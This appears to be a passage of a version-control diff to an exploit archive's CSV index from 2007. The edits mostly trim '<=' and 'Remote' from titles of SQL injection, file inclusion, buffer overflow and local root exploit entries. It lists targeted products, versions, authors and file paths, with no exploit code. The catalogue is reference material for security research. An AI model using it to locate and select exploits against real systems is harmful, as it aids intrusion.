+4078,platforms/php/webapps/4078.php,"Solar Empire 2.9.1.1 - BlindSQL Injection / Hash Retrieve Exploit",2007-06-18,BlackHawk,php,webapps,0 4079,platforms/php/webapps/4079.txt,"MiniBill 1.2.5 - (run_billing.php) Remote File Inclusion",2007-06-18,Abo0od,php,webapps,0 4080,platforms/windows/local/4080.php,"PHP 5.2.3 Tidy extension - Local Buffer Overflow Exploit",2007-06-19,rgod,windows,local,0 4081,platforms/php/webapps/4081.php,"Jasmine CMS 1.0 - SQL Injection/Remote Code Execution Exploit",2007-06-19,Silentz,php,webapps,0 -4082,platforms/php/webapps/4082.pl,"LiveCMS <= 3.4 - (categoria.php cid) Remote SQL Injection Exploit",2007-06-20,g00ns,php,webapps,0 -4083,platforms/asp/webapps/4083.txt,"W1L3D4 WEBmarket 0.1 - Remote SQL Injection",2007-06-20,Crackers_Child,asp,webapps,0 +4082,platforms/php/webapps/4082.pl,"LiveCMS 3.4 - (categoria.php cid) SQL Injection Exploit",2007-06-20,g00ns,php,webapps,0 +4083,platforms/asp/webapps/4083.txt,"W1L3D4 WEBmarket 0.1 - SQL Injection",2007-06-20,Crackers_Child,asp,webapps,0 4084,platforms/php/webapps/4084.txt,"xoops module wiwimod 0.4 - Remote File Inclusion",2007-06-20,GoLd_M,php,webapps,0 4085,platforms/php/webapps/4085.txt,"Musoo 0.21 - Remote File Inclusion Vulnerabilities",2007-06-20,GoLd_M,php,webapps,0 4086,platforms/php/webapps/4086.pl,"LAN Management System (LMS) <= 1.9.6 - Remote File Inclusion Exploit",2007-06-20,Kw3[R]Ln,php,webapps,0 @@ -3743,26 +3743,26 @@ id,file,description,date,author,platform,type,port 4092,platforms/php/webapps/4092.txt,"netclassifieds - (SQL/XSS/full path) Multiple Vulnerabilities",2007-06-22,"laurent gaffié ",php,webapps,0 4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow Exploit",2007-06-22,eliteboy,multiple,remote,80 4094,platforms/windows/remote/4094.html,"BarCode ActiveX Control BarCodeAx.dll 4.9 - Remote Overflow Exploit",2007-06-22,callAX,windows,remote,0 -4095,platforms/php/webapps/4095.txt,"Pharmacy System 2.0 - (index.php ID) Remote SQL Injection",2007-06-24,t0pP8uZz,php,webapps,0 +4095,platforms/php/webapps/4095.txt,"Pharmacy System 2.0 - (index.php ID) SQL Injection",2007-06-24,t0pP8uZz,php,webapps,0 4096,platforms/php/webapps/4096.php,"Pluxml 0.3.1 - Remote Code Execution Exploit",2007-06-24,DarkFig,php,webapps,0 -4097,platforms/php/webapps/4097.txt,"dagger Web engine <= 23jan2007 - Remote File Inclusion",2007-06-24,Katatafish,php,webapps,0 +4097,platforms/php/webapps/4097.txt,"dagger Web engine 23jan2007 - Remote File Inclusion",2007-06-24,Katatafish,php,webapps,0 4098,platforms/php/webapps/4098.php,"Simple Invoices 2007 05 25 - (index.php submit) SQL Injection Exploit",2007-06-24,Kacper,php,webapps,0 4099,platforms/php/webapps/4099.txt,"e107 <= 0.7.8 - (photograph) Arbitrary File Upload",2007-06-24,g00ns,php,webapps,0 -4100,platforms/php/webapps/4100.txt,"phpTrafficA <= 1.4.2 - (pageid) Remote SQL Injection",2007-06-24,"laurent gaffié ",php,webapps,0 +4100,platforms/php/webapps/4100.txt,"phpTrafficA 1.4.2 - (pageid) SQL Injection",2007-06-24,"laurent gaffié ",php,webapps,0 4101,platforms/windows/remote/4101.html,"NCTAudioEditor2 ActiveX DLL (NCTWMAFile2.dll 2.6.2.157) - Exploit",2007-06-25,shinnai,windows,remote,0 4102,platforms/php/webapps/4102.txt,"b1gbb 2.24.0 - (footer.inc.php tfooter) Remote File Inclusion",2007-06-25,Rf7awy,php,webapps,0 4103,platforms/php/webapps/4103.txt,"bugmall shopping cart 2.5 - (SQL/XSS) Multiple Vulnerabilities",2007-06-25,t0pP8uZz,php,webapps,0 -4104,platforms/php/webapps/4104.txt,"6ALBlog (newsid) Remote SQL Injection",2007-06-25,Crackers_Child,php,webapps,0 +4104,platforms/php/webapps/4104.txt,"6ALBlog (newsid) SQL Injection",2007-06-25,Crackers_Child,php,webapps,0 4105,platforms/php/webapps/4105.txt,"SiteDepth CMS 3.44 - (ShowImage.php name) File Disclosure",2007-06-25,"H4 / XPK",php,webapps,0 4106,platforms/php/webapps/4106.php,"DreamLog 0.5 - (upload.php) Arbitrary File Upload Exploit",2007-06-25,Dj7xpl,php,webapps,0 -4107,platforms/php/webapps/4107.txt,"Pagetool 1.07 - (news_id) Remote SQL Injection",2007-06-25,Katatafish,php,webapps,0 -4108,platforms/php/webapps/4108.txt,"eDocStore (doc.php doc_id) Remote SQL Injection",2007-06-25,t0pP8uZz,php,webapps,0 +4107,platforms/php/webapps/4107.txt,"Pagetool 1.07 - (news_id) SQL Injection",2007-06-25,Katatafish,php,webapps,0 +4108,platforms/php/webapps/4108.txt,"eDocStore (doc.php doc_id) SQL Injection",2007-06-25,t0pP8uZz,php,webapps,0 4109,platforms/windows/remote/4109.html,"NCTAudioStudio2 - ActiveX DLL 2.6.1.148 CreateFile() Insecure Method",2007-06-26,shinnai,windows,remote,0 4110,platforms/windows/remote/4110.html,"Avaxswf.dll 1.0.0.1 from Avax Vector - ActiveX Arbitrary Data Write",2007-06-26,callAX,windows,remote,0 4111,platforms/php/webapps/4111.txt,"phpSiteBackup 0.1 - (pcltar.lib.php) Remote File Inclusion",2007-06-26,GoLd_M,php,webapps,0 4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1<= 2.2 - (index.php3) Remote File Inclusion Vulnerabilities",2007-06-26,g00ns,php,webapps,0 4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - (wp-app.php) Arbitrary File Upload Exploit",2007-06-26,"Alexander Concha",php,webapps,0 -4114,platforms/php/webapps/4114.txt,"elkagroup Image Gallery 1.0 - Remote SQL Injection",2007-06-26,t0pP8uZz,php,webapps,0 +4114,platforms/php/webapps/4114.txt,"elkagroup Image Gallery 1.0 - SQL Injection",2007-06-26,t0pP8uZz,php,webapps,0 4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - (lang) Local File Inclusion Vulnerabilities",2007-06-27,Katatafish,php,webapps,0 4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 - (qti_checkname.php) Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 4118,platforms/windows/dos/4118.html,"RealNetworks RealPlayer/HelixPlayer SMIL wallclock Stack Overflow PoC",2007-06-27,axis,windows,dos,0 @@ -3771,34 +3771,34 @@ id,file,description,date,author,platform,type,port 4121,platforms/windows/dos/4121.txt,"Microsoft Excel 2000/2003 - Sheet Name PoC",2007-06-27,ZhenHan.Liu,windows,dos,0 4122,platforms/php/webapps/4122.txt,"b1gbb 2.24.0 - (SQL Injection / XSS) Remote Vulnerabilities",2007-06-28,GoLd_M,php,webapps,0 4123,platforms/windows/remote/4123.html,"AMX Corp. VNC ActiveX Control (AmxVnc.dll 1.0.13.0) BoF Exploit",2007-06-28,rgod,windows,remote,0 -4124,platforms/php/webapps/4124.txt,"GL-SH Deaf Forum <= 6.4.4 - Local File Inclusion Vulnerabilities",2007-06-28,Katatafish,php,webapps,0 -4125,platforms/php/webapps/4125.txt,"WebChat 0.78 - (login.php rid) Remote SQL Injection",2007-06-28,r00t,php,webapps,0 +4124,platforms/php/webapps/4124.txt,"GL-SH Deaf Forum 6.4.4 - Local File Inclusion Vulnerabilities",2007-06-28,Katatafish,php,webapps,0 +4125,platforms/php/webapps/4125.txt,"WebChat 0.78 - (login.php rid) SQL Injection",2007-06-28,r00t,php,webapps,0 4126,platforms/windows/dos/4126.c,"W3Filer 2.1.3 - Remote Stack Overflow PoC",2007-06-29,r0ut3r,windows,dos,0 4127,platforms/php/webapps/4127.txt,"Buddy Zone 1.5 - (view_sub_cat.php cat_id) SQL Injection",2007-06-29,t0pP8uZz,php,webapps,0 -4128,platforms/php/webapps/4128.txt,"Buddy Zone <= 1.5 - Multiple SQL Injection Vulnerabilities",2007-06-30,t0pP8uZz,php,webapps,0 +4128,platforms/php/webapps/4128.txt,"Buddy Zone 1.5 - Multiple SQL Injection Vulnerabilities",2007-06-30,t0pP8uZz,php,webapps,0 4129,platforms/php/webapps/4129.txt,"Ripe Website Manager (CMS) <= 0.8.9 - Remote File Inclusion Vulnerabilities",2007-06-30,BlackNDoor,php,webapps,0 -4130,platforms/php/webapps/4130.txt,"TotalCalendar <= 2.402 - (view_event.php) Remote SQL Injection Vulnerabilities",2007-06-30,t0pP8uZz,php,webapps,0 +4130,platforms/php/webapps/4130.txt,"TotalCalendar 2.402 - (view_event.php) SQL Injection Vulnerabilities",2007-06-30,t0pP8uZz,php,webapps,0 4131,platforms/php/webapps/4131.txt,"XCMS 1.1 - (Galerie.php) Local File Inclusion Vulnerabilities",2007-06-30,BlackNDoor,php,webapps,0 4132,platforms/php/webapps/4132.txt,"sPHPell 1.01 - Multiple Remote File Inclusion Vulnerabilities",2007-06-30,"Mehmet Ince",php,webapps,0 -4133,platforms/php/webapps/4133.txt,"ArcadeBuilder Game Portal Manager 1.7 - Remote SQL Injection",2007-07-01,t0pP8uZz,php,webapps,0 -4134,platforms/php/webapps/4134.txt,"Easybe 1-2-3 Music Store - (process.php) Remote SQL Injection",2007-07-01,t0pP8uZz,php,webapps,0 -4135,platforms/php/webapps/4135.pl,"phpEventCalendar <= 0.2.3 - (eventdisplay.php) SQL Injection Exploit",2007-07-01,Iron,php,webapps,0 -4136,platforms/php/webapps/4136.txt,"YouTube Clone Script (msg.php id) Remote SQL Injection",2007-07-02,t0pP8uZz,php,webapps,0 +4133,platforms/php/webapps/4133.txt,"ArcadeBuilder Game Portal Manager 1.7 - SQL Injection",2007-07-01,t0pP8uZz,php,webapps,0 +4134,platforms/php/webapps/4134.txt,"Easybe 1-2-3 Music Store - (process.php) SQL Injection",2007-07-01,t0pP8uZz,php,webapps,0 +4135,platforms/php/webapps/4135.pl,"phpEventCalendar 0.2.3 - (eventdisplay.php) SQL Injection Exploit",2007-07-01,Iron,php,webapps,0 +4136,platforms/php/webapps/4136.txt,"YouTube Clone Script (msg.php id) SQL Injection",2007-07-02,t0pP8uZz,php,webapps,0 4137,platforms/windows/dos/4137.html,"HP Instant Support (Driver Check) Remote Buffer Overflow Exploit PoC",2007-07-02,shinnai,windows,dos,0 -4138,platforms/php/webapps/4138.txt,"AV Arcade 2.1b (index.php id) Remote SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 -4139,platforms/php/webapps/4139.txt,"PHPDirector <= 0.21 - (videos.php id) Remote SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 -4140,platforms/php/webapps/4140.txt,"vbzoom 1.x - (forum.php MainID) Remote SQL Injection",2007-07-02,"Cold Zero",php,webapps,0 +4138,platforms/php/webapps/4138.txt,"AV Arcade 2.1b (index.php id) SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 +4139,platforms/php/webapps/4139.txt,"PHPDirector 0.21 - (videos.php id) SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 +4140,platforms/php/webapps/4140.txt,"vbzoom 1.x - (forum.php MainID) SQL Injection",2007-07-02,"Cold Zero",php,webapps,0 4141,platforms/php/webapps/4141.txt,"SuperCali PHP Event Calendar 0.4.0 - SQL Injection",2007-07-03,t0pP8uZz,php,webapps,0 -4142,platforms/php/webapps/4142.txt,"Girlserv ads <= 1.5 - (details_news.php) SQL Injection",2007-07-03,"Cold Zero",php,webapps,0 +4142,platforms/php/webapps/4142.txt,"Girlserv ads 1.5 - (details_news.php) SQL Injection",2007-07-03,"Cold Zero",php,webapps,0 4143,platforms/windows/remote/4143.html,"AXIS Camera Control (AxisCamControl.ocx 1.0.2.15) - BoF Exploit",2007-07-03,shinnai,windows,remote,0 -4144,platforms/php/webapps/4144.php,"MyCMS <= 0.9.8 - Remote Command Execution Exploit (2 method)",2007-07-03,BlackHawk,php,webapps,0 -4145,platforms/php/webapps/4145.php,"MyCMS <= 0.9.8 - Remote Command Execution Exploit",2007-07-03,BlackHawk,php,webapps,0 +4144,platforms/php/webapps/4144.php,"MyCMS 0.9.8 - Remote Command Execution Exploit (2 method)",2007-07-03,BlackHawk,php,webapps,0 +4145,platforms/php/webapps/4145.php,"MyCMS 0.9.8 - Remote Command Execution Exploit",2007-07-03,BlackHawk,php,webapps,0 4146,platforms/windows/remote/4146.cpp,"ESRI ArcSDE 9.0 < 9.2sp1 - Remote Buffer Overflow Exploit",2007-07-03,Heretic2,windows,remote,5151 -4147,platforms/php/webapps/4147.php,"PNphpBB2 <= 1.2i - viewforum.php Remote SQL Injection Exploit",2007-07-03,Coloss,php,webapps,0 +4147,platforms/php/webapps/4147.php,"PNphpBB2 <= 1.2i - viewforum.php SQL Injection Exploit",2007-07-03,Coloss,php,webapps,0 4148,platforms/windows/dos/4148.html,"EnjoySAP ActiveX kweditcontrol.kwedit.1 - Remote Stack Overflow PoC",2007-07-05,"Mark Litchfield",windows,dos,0 4149,platforms/windows/dos/4149.html,"EnjoySAP ActiveX rfcguisink.rfcguisink.1 - Remote Heap Overflow PoC",2007-07-05,"Mark Litchfield",windows,dos,0 4150,platforms/php/webapps/4150.txt,"VRNews 1.1.1 - (admin.php) Remote Permission Bypass",2007-07-05,R4M!,php,webapps,0 -4151,platforms/php/webapps/4151.sh,"AsteriDex <= 3.0 - Remote (callboth.php) Remote Code Execution Exploit",2007-07-05,"Carl Livitt",php,webapps,0 +4151,platforms/php/webapps/4151.sh,"AsteriDex 3.0 - Remote (callboth.php) Remote Code Execution Exploit",2007-07-05,"Carl Livitt",php,webapps,0 4152,platforms/windows/remote/4152.py,"ViRC 2.0 - (JOIN Response) Remote SEH Overwrite Exploit (0Day)",2007-07-06,h07,windows,remote,0 4153,platforms/php/webapps/4153.txt,"phpVID 0.9.9 - (categories_type.php cat) SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0 4154,platforms/php/webapps/4154.txt,"eMeeting Online Dating Software 5.2 - SQL Injection Vulnerabilities",2007-07-06,t0pP8uZz,php,webapps,0 @@ -3806,19 +3806,19 @@ id,file,description,date,author,platform,type,port 4156,platforms/php/webapps/4156.txt,"limesurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion",2007-07-06,"Yakir Wizman",php,webapps,0 4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 WebTools Remote SEH overwrite Exploit",2007-07-07,Heretic2,windows,remote,9999 4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX TraceTarget() Remote BoF Exploit",2007-07-07,nitr0us,windows,remote,0 -4159,platforms/php/webapps/4159.txt,"GameSiteScript <= 3.1 - (profile id) Remote SQL Injection",2007-07-07,Xenduer77,php,webapps,0 +4159,platforms/php/webapps/4159.txt,"GameSiteScript 3.1 - (profile id) SQL Injection",2007-07-07,Xenduer77,php,webapps,0 4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods Exploit",2007-07-07,shinnai,windows,remote,0 -4161,platforms/php/webapps/4161.txt,"FlashGameScript <= 1.7 - (user) Remote SQL Injection",2007-07-08,Xenduer77,php,webapps,0 +4161,platforms/php/webapps/4161.txt,"FlashGameScript 1.7 - (user) SQL Injection",2007-07-08,Xenduer77,php,webapps,0 4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)",2007-07-08,Xpl017Elz,linux,remote,80 4163,platforms/php/webapps/4163.php,"AV Tutorial Script 1.0 - Remote User Pass Change Exploit",2007-07-08,Dj7xpl,php,webapps,0 -4164,platforms/php/webapps/4164.txt,"Aigaion <= 1.3.3 - (topic topic_id) Remote SQL Injection",2007-07-09,CypherXero,php,webapps,0 +4164,platforms/php/webapps/4164.txt,"Aigaion 1.3.3 - (topic topic_id) SQL Injection",2007-07-09,CypherXero,php,webapps,0 4165,platforms/windows/local/4165.c,"WinPcap 4.0 - NPF.SYS Privilege Elevation PoC Exploit",2007-07-10,"Mario Ballano Bárcena",windows,local,0 4166,platforms/php/webapps/4166.txt,"vBulletin Mod RPG Inferno 2.4 - (inferno.php) SQL Injection",2007-07-10,t0pP8uZz,php,webapps,0 -4167,platforms/php/webapps/4167.txt,"OpenLD <= 1.2.2 - (index.php id) Remote SQL Injection",2007-07-10,CypherXero,php,webapps,0 +4167,platforms/php/webapps/4167.txt,"OpenLD 1.2.2 - (index.php id) SQL Injection",2007-07-10,CypherXero,php,webapps,0 4168,platforms/windows/dos/4168.vbs,"Sun Java WebStart JNLP Stack Buffer Overflow Exploit PoC",2007-07-10,ZhenHan.Liu,windows,dos,0 -4169,platforms/php/webapps/4169.txt,"FlashBB <= 1.1.8 - (sendmsg.php) Remote File Inclusion",2007-07-10,Kw3[R]Ln,php,webapps,0 +4169,platforms/php/webapps/4169.txt,"FlashBB 1.1.8 - (sendmsg.php) Remote File Inclusion",2007-07-10,Kw3[R]Ln,php,webapps,0 4170,platforms/windows/remote/4170.html,"Program Checker (sasatl.dll 1.5.0.531) Javascript Heap Spraying Exploit",2007-07-10,callAX,windows,remote,0 -4171,platforms/php/webapps/4171.pl,"Mail Machine <= 3.989 - Local File Inclusion Exploit",2007-07-10,"H4 / XPK",php,webapps,0 +4171,platforms/php/webapps/4171.pl,"Mail Machine 3.989 - Local File Inclusion Exploit",2007-07-10,"H4 / XPK",php,webapps,0 4172,platforms/linux/local/4172.c,"Linux Kernel < 2.6.20.2 - IPv6_Getsockopt_Sticky Memory Leak Proof of Concept",2007-07-10,dreyer,linux,local,0 4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution",2007-07-11,jmp-esp,php,webapps,0 4174,platforms/php/webapps/4174.txt,"PsNews 1.1 - (show.php newspath) Local File Inclusion",2007-07-12,irk4z,php,webapps,0 @@ -3826,137 +3826,137 @@ id,file,description,date,author,platform,type,port 4176,platforms/windows/remote/4176.html,"SecureBlackbox (PGPBBox.dll 5.1.0.112) - Arbitrary Data Write Exploit",2007-07-12,callAX,windows,remote,0 4177,platforms/windows/remote/4177.html,"Program Checker (sasatl.dll 1.5.0.531) DebugMsgLog Heap Spraying Exploit",2007-07-12,callAX,windows,remote,0 4178,platforms/windows/local/4178.txt,"Symantec AntiVirus - symtdi.sys Local Privilege Escalation Exploit",2007-07-12,"Zohiartze Herce",windows,local,0 -4179,platforms/php/webapps/4179.php,"MkPortal <= 1.1.1 reviews / gallery modules SQL Injection Exploit",2007-07-12,Coloss,php,webapps,0 +4179,platforms/php/webapps/4179.php,"MkPortal 1.1.1 reviews / gallery modules SQL Injection Exploit",2007-07-12,Coloss,php,webapps,0 4180,platforms/php/webapps/4180.txt,"MKPortal NoBoard Module (BETA) Remote File Inclusion",2007-07-14,g00ns,php,webapps,0 4181,platforms/multiple/dos/4181.php,"PHP 5.2.3 - glob() Denial of Service Exploit",2007-07-14,shinnai,multiple,dos,0 -4182,platforms/php/webapps/4182.txt,"CMScout <= 1.23 - (index.php) Remote SQL Injection",2007-07-14,g00ns,php,webapps,0 +4182,platforms/php/webapps/4182.txt,"CMScout 1.23 - (index.php) SQL Injection",2007-07-14,g00ns,php,webapps,0 4183,platforms/php/webapps/4183.txt,"eSyndiCat Directory Software Multiple SQL Injection Vulnerabilities",2007-07-14,d3v1l,php,webapps,0 -4184,platforms/php/webapps/4184.txt,"Realtor 747 - (index.php categoryid) Remote SQL Injection Vulnerbility",2007-07-14,t0pP8uZz,php,webapps,0 -4185,platforms/php/webapps/4185.txt,"Prozilla Directory Script - (directory.php cat_id) SQL Injection Vulnerbility",2007-07-14,t0pP8uZz,php,webapps,0 -4186,platforms/php/webapps/4186.txt,"paFileDB 3.6 - (search.php) Remote SQL Injection",2007-07-14,pUm,php,webapps,0 -4187,platforms/php/webapps/4187.txt,"Traffic Stats (referralUrl.php offset) Remote SQL Injection Vulnerbility",2007-07-16,t0pP8uZz,php,webapps,0 +4184,platforms/php/webapps/4184.txt,"Realtor 747 - (index.php categoryid) SQL Injection",2007-07-14,t0pP8uZz,php,webapps,0 +4185,platforms/php/webapps/4185.txt,"Prozilla Directory Script - (directory.php cat_id) SQL Injection",2007-07-14,t0pP8uZz,php,webapps,0 +4186,platforms/php/webapps/4186.txt,"paFileDB 3.6 - (search.php) SQL Injection",2007-07-14,pUm,php,webapps,0 +4187,platforms/php/webapps/4187.txt,"Traffic Stats (referralUrl.php offset) SQL Injection",2007-07-16,t0pP8uZz,php,webapps,0 4188,platforms/windows/remote/4188.txt,"Flash Player/Plugin Video - File Parsing Remote Code Execution PoC",2007-07-16,yunshu,windows,remote,0 -4189,platforms/php/webapps/4189.txt,"Expert Advisior (index.php id) Remote SQL Injection Vulnerbility",2007-07-17,t0pP8uZz,php,webapps,0 -4190,platforms/windows/remote/4190.html,"Data Dynamics ActiveBar ActiveX (actbar3.ocx <= 3.1) Insecure Methods",2007-07-17,shinnai,windows,remote,0 -4191,platforms/php/webapps/4191.txt,"Pictures Rating - (index.php msgid) Remote SQL Injection Vulnerbility",2007-07-18,t0pP8uZz,php,webapps,0 -4192,platforms/php/webapps/4192.htm,"Vivvo CMS <= 3.4 - (index.php) Remote BLIND SQL Injection Exploit",2007-07-18,ajann,php,webapps,0 -4193,platforms/php/webapps/4193.txt,"QuickEStore <= 8.2 - (insertorder.cfm) Remote SQL Injection",2007-07-18,meoconx,php,webapps,0 -4194,platforms/php/webapps/4194.txt,"Joomla Component Expose <= RC35 - Remote File Upload",2007-07-18,"Cold Zero",php,webapps,0 +4189,platforms/php/webapps/4189.txt,"Expert Advisior (index.php id) SQL Injection",2007-07-17,t0pP8uZz,php,webapps,0 +4190,platforms/windows/remote/4190.html,"Data Dynamics ActiveBar ActiveX (actbar3.ocx 3.1) Insecure Methods",2007-07-17,shinnai,windows,remote,0 +4191,platforms/php/webapps/4191.txt,"Pictures Rating - (index.php msgid) SQL Injection",2007-07-18,t0pP8uZz,php,webapps,0 +4192,platforms/php/webapps/4192.htm,"Vivvo CMS 3.4 - (index.php) Remote BLIND SQL Injection Exploit",2007-07-18,ajann,php,webapps,0 +4193,platforms/php/webapps/4193.txt,"QuickEStore 8.2 - (insertorder.cfm) SQL Injection",2007-07-18,meoconx,php,webapps,0 +4194,platforms/php/webapps/4194.txt,"Joomla Component Expose RC35 - Remote File Upload",2007-07-18,"Cold Zero",php,webapps,0 4195,platforms/php/webapps/4195.txt,"BBS E-Market (postscript.php p_mode) Remote File Inclusion",2007-07-18,mozi,php,webapps,0 4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22 / 1.4.8 / 2.2.1 - chan_skinny Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0 -4197,platforms/php/webapps/4197.txt,"phpBB Module SupaNav 1.0.0 - (link_main.php) RFI",2007-07-18,bd0rk,php,webapps,0 -4198,platforms/asp/webapps/4198.txt,"A-shop <= 0.70 - Remote File Deletion",2007-07-18,Timq,asp,webapps,0 -4199,platforms/php/webapps/4199.txt,"Md-Pro <= 1.0.8x (Topics topicid) Remote SQL Injection",2007-07-18,anonymous,php,webapps,0 +4197,platforms/php/webapps/4197.txt,"phpBB Module SupaNav 1.0.0 - (link_main.php) Remote File Inclusion",2007-07-18,bd0rk,php,webapps,0 +4198,platforms/asp/webapps/4198.txt,"A-shop 0.70 - Remote File Deletion",2007-07-18,Timq,asp,webapps,0 +4199,platforms/php/webapps/4199.txt,"Md-Pro 1.0.8x (Topics topicid) SQL Injection",2007-07-18,anonymous,php,webapps,0 4200,platforms/windows/remote/4200.html,"Versalsoft HTTP File Uploader AddFile() Remote Buffer Overflow Exploit",2007-07-19,shinnai,windows,remote,0 -4201,platforms/php/webapps/4201.txt,"Joomla Component Pony Gallery <= 1.5 - SQL Injection",2007-07-19,ajann,php,webapps,0 +4201,platforms/php/webapps/4201.txt,"Joomla Component Pony Gallery 1.5 - SQL Injection",2007-07-19,ajann,php,webapps,0 4203,platforms/multiple/local/4203.sql,"Oracle 9i/10g Evil Views - Change Passwords Exploit",2007-07-19,bunker,multiple,local,0 -4204,platforms/windows/local/4204.php,"PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit",2007-07-20,shinnai,windows,local,0 +4204,platforms/windows/local/4204.php,"PHP 5.2.3 snmpget() object id Local Buffer Overflow Exploit",2007-07-20,shinnai,windows,local,0 4205,platforms/windows/dos/4205.pl,"TeamSpeak 2.0 - (Windows Release) Remote Denial of Service Exploit",2007-07-20,"YAG KOHHA",windows,dos,0 -4206,platforms/php/webapps/4206.txt,"Blog System 1.x - (index.php news_id) Remote SQL Injection",2007-07-20,t0pP8uZz,php,webapps,0 +4206,platforms/php/webapps/4206.txt,"Blog System 1.x - (index.php news_id) SQL Injection",2007-07-20,t0pP8uZz,php,webapps,0 4207,platforms/windows/remote/4207.py,"Lotus Domino IMAP4 Server 6.5.4 - Remote Buffer Overflow Exploit",2007-07-20,"dmc and prdelka",windows,remote,143 -4208,platforms/windows/remote/4208.html,"Data Dynamics ActiveReport ActiveX (actrpt2.dll <= 2.5) Inscure Method",2007-07-21,shinnai,windows,remote,0 -4209,platforms/php/webapps/4209.txt,"WSN Links Basic Edition (displaycat catid) SQL Injection Vulnerbility",2007-07-21,t0pP8uZz,php,webapps,0 +4208,platforms/windows/remote/4208.html,"Data Dynamics ActiveReport ActiveX (actrpt2.dll 2.5) Inscure Method",2007-07-21,shinnai,windows,remote,0 +4209,platforms/php/webapps/4209.txt,"WSN Links Basic Edition (displaycat catid) SQL Injection",2007-07-21,t0pP8uZz,php,webapps,0 4210,platforms/php/webapps/4210.txt,"RGameScript Pro (page.php id) Remote File Inclusion",2007-07-21,Warpboy,php,webapps,0 4211,platforms/php/webapps/4211.htm,"JBlog 1.0 Create / Delete Admin Authentication Bypass Exploit",2007-07-21,s4mi,php,webapps,0 4212,platforms/php/webapps/4212.txt,"Joomla! CMS 1.5 beta 2 - (search) Remote Code Execution",2007-07-22,"Johannes Greil",php,webapps,0 -4213,platforms/php/webapps/4213.txt,"bwired (index.php newsID) Remote SQL Injection",2007-07-22,g00ns,php,webapps,0 +4213,platforms/php/webapps/4213.txt,"bwired (index.php newsID) SQL Injection",2007-07-22,g00ns,php,webapps,0 4214,platforms/windows/remote/4214.html,"Zenturi NixonMyPrograms Class (sasatl.dll 1.5.0.531) - Remote BoF",2007-07-23,shinnai,windows,remote,0 4215,platforms/windows/dos/4215.pl,"Microsoft Windows - Explorer.exe Gif Image Denial of Service Exploit",2007-07-23,DeltahackingTEAM,windows,dos,0 4216,platforms/linux/dos/4216.pl,"Xserver 0.1 Alpha Post Request Remote Buffer Overflow Exploit",2007-07-23,deusconstruct,linux,dos,0 4217,platforms/windows/remote/4217.html,"LinkedIn Toolbar 3.0.2.1098 - Remote Buffer Overflow Exploit",2007-07-24,"Jared DeMott",windows,remote,0 4218,platforms/windows/local/4218.php,"PHP 5.2.3 - Win32std ext. safe_mode/disable_functions Protections Bypass",2007-07-24,shinnai,windows,local,0 -4219,platforms/php/webapps/4219.txt,"Confixx Pro <= 3.3.1 - (saveserver.php) Remote File Inclusion",2007-07-24,"H4 / XPK",php,webapps,0 +4219,platforms/php/webapps/4219.txt,"Confixx Pro 3.3.1 - (saveserver.php) Remote File Inclusion",2007-07-24,"H4 / XPK",php,webapps,0 4220,platforms/php/webapps/4220.pl,"Entertainment CMS (Local Inclusion) Remote Command Execution Exploit",2007-07-24,Kw3[R]Ln,php,webapps,0 4221,platforms/php/webapps/4221.txt,"Article Directory (index.php page) Remote File Inclusion",2007-07-24,mozi,php,webapps,0 4222,platforms/windows/remote/4222.c,"Windows RSH daemon 1.7 - Remote Buffer Overflow Exploit",2007-07-24,"Joey Mengele",windows,remote,514 4223,platforms/windows/remote/4223.pl,"IPSwitch IMail Server 2006 - SEARCH Remote Stack Overflow Exploit",2007-07-25,ZhenHan.Liu,windows,remote,143 -4224,platforms/php/webapps/4224.txt,"Webyapar 2.0 - Multiple Remote SQL Injection Vulnerabilities",2007-07-25,bypass,php,webapps,0 -4225,platforms/php/webapps/4225.txt,"IndexScript <= 2.8 - (show_cat.php cat_id) SQL Injection",2007-07-25,xssvgamer,php,webapps,0 +4224,platforms/php/webapps/4224.txt,"Webyapar 2.0 - Multiple SQL Injection Vulnerabilities",2007-07-25,bypass,php,webapps,0 +4225,platforms/php/webapps/4225.txt,"IndexScript 2.8 - (show_cat.php cat_id) SQL Injection",2007-07-25,xssvgamer,php,webapps,0 4226,platforms/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 - Arbitrary File Download/Overwrite",2007-07-25,shinnai,windows,remote,0 4227,platforms/windows/dos/4227.php,"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",2007-07-26,r0ut3r,windows,dos,0 4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 SUBSCRIBE Remote Overflow Exploit",2007-07-26,ZhenHan.Liu,windows,remote,143 4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - (.mls) Local Buffer Overflow Exploit",2007-07-26,"Arham Muhammad",windows,local,0 4230,platforms/windows/remote/4230.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Remote Delete File Exploit",2007-07-26,h07,windows,remote,0 -4231,platforms/aix/local/4231.c,"IBM AIX <= 5.3 sp6 - capture Terminal Sequence Local Root Exploit",2007-07-27,qaaz,aix,local,0 -4232,platforms/aix/local/4232.sh,"IBM AIX <= 5.3 sp6 - pioout Arbitrary Library Loading Local Root Exploit",2007-07-27,qaaz,aix,local,0 -4233,platforms/aix/local/4233.c,"IBM AIX <= 5.3 sp6 - ftp gets() Local Root Exploit",2007-07-27,qaaz,aix,local,0 +4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Local Root 